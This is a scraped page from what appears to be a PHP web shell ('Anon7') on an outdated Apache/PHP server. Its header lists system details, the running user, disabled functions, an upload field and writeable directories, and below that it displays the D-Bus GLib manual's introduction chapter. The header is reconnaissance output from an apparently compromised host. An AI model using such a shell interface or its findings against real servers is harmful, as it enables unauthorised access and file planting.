KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
System : Linux localhost 2.6.18-419.el5 #1 SMP Fri Feb 24 22:47:42 UTC 2017 x86_64
User : nobody ( 99)
PHP Version : 5.2.17
Disable Function : NONE
Directory :  /usr/share/gtk-doc/html/dbus-glib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/gtk-doc/html/dbus-glib/ch01.html
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>Introduction</title>
<meta name="generator" content="DocBook XSL Stylesheets V1.68.1">
<link rel="start" href="index.html" title="D-Bus GLib bindings - Reference Manual">
<link rel="up" href="index.html" title="D-Bus GLib bindings - Reference Manual">
<link rel="prev" href="index.html" title="D-Bus GLib bindings - Reference Manual">
<link rel="next" href="ch02.html" title="API Reference">
<meta name="generator" content="GTK-Doc V1.7 (XML mode)">
<link rel="stylesheet" href="style.css" type="text/css">
<link rel="chapter" href="ch01.html" title="Introduction">
<link rel="chapter" href="ch02.html" title="API Reference">
<link rel="chapter" href="ch03.html" title="Tools Reference">
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<table class="navigation" id="top" width="100%" summary="Navigation header" cellpadding="2" cellspacing="2"><tr valign="middle">
<td><a accesskey="p" href="index.html"><img src="left.png" width="24" height="24" border="0" alt="Prev"></a></td>
<td>&#160;</td>
<td><a accesskey="h" href="index.html"><img src="home.png" width="24" height="24" border="0" alt="Home"></a></td>
<th width="100%" align="center">D-Bus GLib bindings - Reference Manual</th>
<td><a accesskey="n" href="ch02.html"><img src="right.png" width="24" height="24" border="0" alt="Next"></a></td>
</tr></table>
<div class="chapter" lang="en">
<div class="titlepage"><div><div><h2 class="title">
<a name="id2516057"></a>Introduction</h2></div></div></div>
<p>D-Bus is a message bus system, a simple way for applications
    to talk to one another.</p>
<p>D-Bus supplies both a system daemon (for events such as "new
    hardware  device   added"  or  "printer  queue   changed")  and  a
    per-user-login-session  daemon (for general  IPC needs  among user
    applications). Also, the message bus  is built on top of a general
    one-to-one message passing framework, which can be used by any two
    apps to  communicate directly  (without going through  the message
    bus daemon).  Currently the communicating applications  are on one
    computer,  but  TCP/IP  option  is available  and  remote  support
    planned.</p>
<p>The D-Bus  API isn't finished yet,  and the design  is by no
    means set in stone. One of  our main goals is for lots of projects
    to use it, so if you wouldn't use it, by all means mail us and say
    why -  design, licensing, indentation style, we  would rather know
    than not know.</p>
<p>D-Bus' only  *required* dependency is an  XML parser (either
    libxml  or expat). D-Bus  includes many  language bindings  to the
    D-Bus system,  if you  want to build  those. The list  of projects
    using D-Bus  is growing and they  provide a wealth  of examples of
    using the various APIs to learn from.</p>
<p>Trying out  D-Bus in sample applications is  encouraged - we
      want to  get it  widely used and  tested.  It should  be working
      pretty well these  days, and when it isn't  bug reports are very
      welcome.</p>
<p>
    HomePage: <a href="http://http://www.freedesktop.org/wiki/Software/dbus" target="_top">
    http://http://www.freedesktop.org/wiki/Software/dbus</a>
    </p>
</div>
</body>
</html>

Anon7 - 2021